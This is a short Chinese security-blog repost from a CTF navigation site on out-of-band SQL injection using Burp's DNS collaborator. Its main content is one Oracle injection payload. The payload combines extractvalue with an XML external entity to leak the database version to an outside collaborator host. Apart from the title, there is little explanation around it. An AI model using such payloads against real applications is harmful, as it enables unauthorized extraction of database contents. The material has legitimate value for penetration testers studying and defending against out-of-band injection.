CTF导航 CTF导航

通过Burp使用DNS协作器进行的带外SQL攻击

渗透技巧 1年前 (2022) admin
416 0 0


通过Burp使用DNS协作器进行的带外SQL攻击

Version Payload :

(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % vapot SYSTEM "'||(select version from v$instance)||'Burp/">%vapot;]>'),'/l') from dual)

原文始发于微信公众号(Khan安全攻防实验室):通过Burp使用DNS协作器进行的带外SQL攻击

版权声明:admin 发表于 2022年12月22日 上午11:00。
转载请注明:通过Burp使用DNS协作器进行的带外SQL攻击 | CTF导航

相关文章

Git Arbitrary Configuration Injection (CVE-2023-29007)
admin
419
FabriXss (CVE-2022-35829):使用CSTI和存储XSS来滥用自定义角色用户
admin
450
每日安全动态推送(07-08)
admin
789
代码审计-ASP.NET项目-未授权访问漏洞
admin
37
.Net内存加载与卸载探讨
admin
660
记一次从站库分离的MSSQL注入到用xp_cmdshell进行内网漫游的过程
admin
628

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

VM逆向,一篇就够了
0
先知安全沙龙(西安站) – 浅谈XSS漏洞挖掘与构造思路
0
A Detailed Guide on Pwncat
0
geoserver代码审计
0
代理(ATT&CK篇)
0
CVE-2024-24576 Windows 下多语言命令注入漏洞分析
0
Ray OS 2.6.3 Command Injection
0
Moodle 3.10.1 – Authenticated Blind Time-Based SQL Injection – “sort” parameter
0
Online Fire Reporting System OFRS – SQL Injection Authentication Bypass
0
How a Race Condition Vulnerability Could Cast Multiple Votes
0